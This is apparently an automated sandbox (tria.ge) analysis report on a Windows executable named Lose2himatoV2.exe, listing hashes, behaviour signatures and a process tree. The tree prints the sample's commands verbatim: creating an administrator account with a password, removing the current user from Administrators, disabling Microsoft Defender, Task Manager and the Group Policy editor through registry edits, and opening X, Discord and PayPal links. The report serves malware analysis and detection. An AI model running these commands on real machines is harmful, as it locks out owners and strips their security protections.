Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
76s -
max time network
81s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
04/01/2025, 23:24
Static task
static1
Behavioral task
behavioral1
Sample
Lose2himatoV2.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral2
Sample
Lose2himatoV2.exe
Resource
win11-20241007-en
Errors
General
-
Target
Lose2himatoV2.exe
-
Size
138.5MB
-
MD5
b13b58171063faf469d7cffd178644a6
-
SHA1
0cc178b5db25710be4181e0f15b70ca8c3049ef2
-
SHA256
974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506
-
SHA512
511d96d59fc5646aead6f0bf16ecbe9f9e1ab60e05954b02d2b53c7686df2ccfe85374388fc5aece04e50bd37ff3411319c7107d52cc33c3af819fb47ab570e3
-
SSDEEP
786432:Y93oFjO6NbbB6uTE/kbsV0jmB/gWD4otJ0njnEMIQAhpLoMS/QVQfmLh0VPdTtLH:Y9SjOsbbUng40ihpEX/QVQfmLmxHXutU
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables Task Manager via registry modification
-
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 1396 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 discord.com 13 discord.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp" Lose2himatoV2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lose2himatoV2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2410826464-2353372766-2364966905-1000\{C821189A-2B7B-46E6-A626-F01F169BC4ED} msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4932 msedge.exe 4932 msedge.exe 4520 msedge.exe 4520 msedge.exe 4088 msedge.exe 4088 msedge.exe 4692 msedge.exe 4692 msedge.exe 5772 msedge.exe 5772 msedge.exe 4660 msedge.exe 4660 msedge.exe 1088 identity_helper.exe 1088 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeShutdownPrivilege 5344 shutdown.exe Token: SeRemoteShutdownPrivilege 5344 shutdown.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe 4692 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 6136 PickerHost.exe 3464 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4760 wrote to memory of 5028 4760 Lose2himatoV2.exe 79 PID 4760 wrote to memory of 5028 4760 Lose2himatoV2.exe 79 PID 4760 wrote to memory of 5028 4760 Lose2himatoV2.exe 79 PID 4760 wrote to memory of 4204 4760 Lose2himatoV2.exe 81 PID 4760 wrote to memory of 4204 4760 Lose2himatoV2.exe 81 PID 4760 wrote to memory of 4204 4760 Lose2himatoV2.exe 81 PID 4760 wrote to memory of 2732 4760 Lose2himatoV2.exe 83 PID 4760 wrote to memory of 2732 4760 Lose2himatoV2.exe 83 PID 4760 wrote to memory of 2732 4760 Lose2himatoV2.exe 83 PID 4760 wrote to memory of 1396 4760 Lose2himatoV2.exe 84 PID 4760 wrote to memory of 1396 4760 Lose2himatoV2.exe 84 PID 4760 wrote to memory of 1396 4760 Lose2himatoV2.exe 84 PID 4760 wrote to memory of 2500 4760 Lose2himatoV2.exe 85 PID 4760 wrote to memory of 2500 4760 Lose2himatoV2.exe 85 PID 4760 wrote to memory of 2500 4760 Lose2himatoV2.exe 85 PID 4760 wrote to memory of 3580 4760 Lose2himatoV2.exe 89 PID 4760 wrote to memory of 3580 4760 Lose2himatoV2.exe 89 PID 4760 wrote to memory of 3580 4760 Lose2himatoV2.exe 89 PID 5028 wrote to memory of 3972 5028 cmd.exe 90 PID 5028 wrote to memory of 3972 5028 cmd.exe 90 PID 5028 wrote to memory of 3972 5028 cmd.exe 90 PID 4204 wrote to memory of 3432 4204 cmd.exe 91 PID 4204 wrote to memory of 3432 4204 cmd.exe 91 PID 4204 wrote to memory of 3432 4204 cmd.exe 91 PID 3432 wrote to memory of 3924 3432 net.exe 92 PID 3432 wrote to memory of 3924 3432 net.exe 92 PID 3432 wrote to memory of 3924 3432 net.exe 92 PID 3972 wrote to memory of 2708 3972 net.exe 93 PID 3972 wrote to memory of 2708 3972 net.exe 93 PID 3972 wrote to memory of 2708 3972 net.exe 93 PID 2732 wrote to memory of 2612 2732 cmd.exe 94 PID 2732 wrote to memory of 2612 2732 cmd.exe 94 PID 2732 wrote to memory of 2612 2732 cmd.exe 94 PID 1396 wrote to memory of 2124 1396 cmd.exe 95 PID 1396 wrote to memory of 2124 1396 cmd.exe 95 PID 1396 wrote to memory of 2124 1396 cmd.exe 95 PID 2500 wrote to memory of 3168 2500 cmd.exe 96 PID 2500 wrote to memory of 3168 2500 cmd.exe 96 PID 2500 wrote to memory of 3168 2500 cmd.exe 96 PID 2124 wrote to memory of 2028 2124 net.exe 97 PID 2124 wrote to memory of 2028 2124 net.exe 97 PID 2124 wrote to memory of 2028 2124 net.exe 97 PID 2612 wrote to memory of 4072 2612 net.exe 98 PID 2612 wrote to memory of 4072 2612 net.exe 98 PID 2612 wrote to memory of 4072 2612 net.exe 98 PID 4760 wrote to memory of 2812 4760 Lose2himatoV2.exe 102 PID 4760 wrote to memory of 2812 4760 Lose2himatoV2.exe 102 PID 4760 wrote to memory of 2812 4760 Lose2himatoV2.exe 102 PID 4760 wrote to memory of 4236 4760 Lose2himatoV2.exe 104 PID 4760 wrote to memory of 4236 4760 Lose2himatoV2.exe 104 PID 4760 wrote to memory of 4236 4760 Lose2himatoV2.exe 104 PID 4236 wrote to memory of 4428 4236 cmd.exe 106 PID 4236 wrote to memory of 4428 4236 cmd.exe 106 PID 4236 wrote to memory of 4428 4236 cmd.exe 106 PID 2812 wrote to memory of 2624 2812 cmd.exe 107 PID 2812 wrote to memory of 2624 2812 cmd.exe 107 PID 2812 wrote to memory of 2624 2812 cmd.exe 107 PID 4760 wrote to memory of 3488 4760 Lose2himatoV2.exe 108 PID 4760 wrote to memory of 3488 4760 Lose2himatoV2.exe 108 PID 4760 wrote to memory of 3488 4760 Lose2himatoV2.exe 108 PID 4760 wrote to memory of 564 4760 Lose2himatoV2.exe 110 PID 4760 wrote to memory of 564 4760 Lose2himatoV2.exe 110 PID 4760 wrote to memory of 564 4760 Lose2himatoV2.exe 110 PID 3488 wrote to memory of 4268 3488 cmd.exe 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"1⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user Lose2himato /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\net.exenet user Lose2himato /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Lose2himato /add4⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\net.exenet user Lose2himato dumbass3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Lose2himato dumbass4⤵
- System Location Discovery: System Language Discovery
PID:3924
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\net.exenet localgroup Administrators "Lose2himato" /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add4⤵
- System Location Discovery: System Language Discovery
PID:4072
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete2⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\net.exenet localgroup Administrators "Admin" /delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "Admin" /delete4⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:3168
-
-
-
C:\Windows\SysWOW64\explorer.exe"explorer.exe"2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3580
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f3⤵
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f3⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:4268
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
PID:564 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:4396
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to2⤵
- System Location Discovery: System Language Discovery
PID:3496 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to3⤵PID:2948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb67303cb8,0x7ffb67303cc8,0x7ffb67303cd84⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1828,2107120149633614801,5472195119550670762,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1816 /prefetch:24⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,2107120149633614801,5472195119550670762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:4932
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck2⤵
- System Location Discovery: System Language Discovery
PID:3300 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck3⤵PID:3968
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb67303cb8,0x7ffb67303cc8,0x7ffb67303cd84⤵PID:2016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,3416842724557945885,16810939765191857453,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1992 /prefetch:24⤵PID:4020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,3416842724557945885,16810939765191857453,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:4088
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato6662⤵
- System Location Discovery: System Language Discovery
PID:1568 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato6663⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4692 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67303cb8,0x7ffb67303cc8,0x7ffb67303cd84⤵PID:1016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:24⤵PID:3000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:84⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:14⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:14⤵PID:3880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:14⤵PID:1216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:14⤵PID:3336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:14⤵PID:5204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:14⤵PID:5288
-
-
